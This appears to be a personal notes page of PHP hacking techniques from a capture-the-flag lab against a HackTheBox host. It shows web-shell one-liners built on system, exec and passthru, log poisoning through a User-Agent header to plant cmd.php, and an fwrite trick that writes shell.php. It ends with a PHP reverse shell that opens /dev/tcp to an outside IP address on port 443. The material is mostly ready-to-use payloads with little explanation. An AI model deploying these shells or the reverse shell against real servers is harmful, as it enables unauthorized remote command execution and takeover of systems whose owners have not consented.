Comment on page
php hacks

reverse shell github repository: 
GitHub - ivan-sincek/php-reverse-shell: PHP shells that work on Linux OS, macOS, and Windows OS.
GitHub
​
<?php system($ REQUEST['cmd']); ?>
 
​
It looks like it's logging everytime someone visits the log.php
if we change the useragent to malicious code, we can execute?
<?php system($ REQUEST['cmd']); ?>
successfully executed 
By changing te useragent to the code, it planted a code execution path with the file name (the file name can be anything) 
changed useragent to the php code
changed file name to cmd.php in GET 
​
now we can go to http://internal-01.bart.htb/log/cmd.php?cmd=whoami to execute it 
now we can do reverse shell! 
​
​
----
​
test php 
<?php 
echo("Gorigorisensei Hacking your System.") ;
?> 
Another case: 
code=fwrite(fopen('shell.php','w'),'<?php echo exec($_GET["cmd"]);?>');
Logical Flows 
Creating a file (write it) 
fwrite(fopen('shell.php','w')
2. put the command in it so it will be executed when we visit /shell.php?cmd=whoami
'<?php echo exec($_GET["cmd"]);?>');
since it didn't like having the single quotation mark when I used exec($_GET['cmd'])
other php one liners 
POST didn't work since it's already creating a file for us in the first command. 
Other one liners to try:
<?php echo passthru($_GET['cmd']); ?>
​
<?php echo exec($_POST['cmd']); ?>
​
<?php system($_GET['cmd']); ?>
​
<?php passthru($_REQUEST['cmd']); ?>
​
<?php echo system("0<&196;exec 196<>/dev/tcp/192.168.119.212/443; sh <&196 >&196 2>&196"); ?>
​
​
​
Port Swigger SQL
php
Last modified 1yr ago